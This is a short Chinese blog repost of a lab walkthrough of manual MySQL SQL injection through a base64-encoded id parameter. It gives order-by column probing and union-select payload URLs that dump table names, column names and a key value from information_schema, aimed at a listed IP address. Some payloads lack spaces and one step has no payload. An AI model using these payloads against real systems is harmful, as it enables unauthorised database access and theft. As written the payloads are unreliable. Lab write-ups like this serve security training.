mysql手工注入

发布时间: 2023-11-21 13:10 阅读: 文章来源:1MUMB4805PS
SQL注入实战

说明:下面的URL为了让读者可以看清,所以没有进行URL的base64加密,但是读者在执行前需要对其进行base64加密,之后才可以正常执行!本次靶场操作以个人的实验环境为例。

首先从我实验的靶场可以看到该URL中存在一个参数,从参数的格式来看是通过了base64进行了加密,那么我们可以对其进行base64解密。

发现解密之后的参数为1,这种类型的注入除了和我们以前的普通注入相比只是多了一个“base64”加密的过程,下面进行手工注入演示:

1、判断是否可以注入:

and 测试;

由上判断可以得知存在SQL注入。

2、猜解字段长度

order by 2

order by 3

可以猜到字段长度为2。

3、爆数据库名、数据库版本信息

4、爆表名

http://219.153.49.228:48204/show.php?id=-1unionselect TABLE_NAME,2 from information_schema.TABLES where TABLE_SCHEMA=0x74657374 limit 0,1--

5、爆字段名

http://219.153.49.228:48204/show.php?id=-1unionselect COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME=0x64617461 limit 3,1

6、爆字段值

http://219.153.49.228:48204/show.php?id=-1unionselect thekey,2 from test.data limit 0,1--

至此得到最后的内容!

转载:https://blog.csdn.net/fly_hps/article/details/80208384

•••展开全文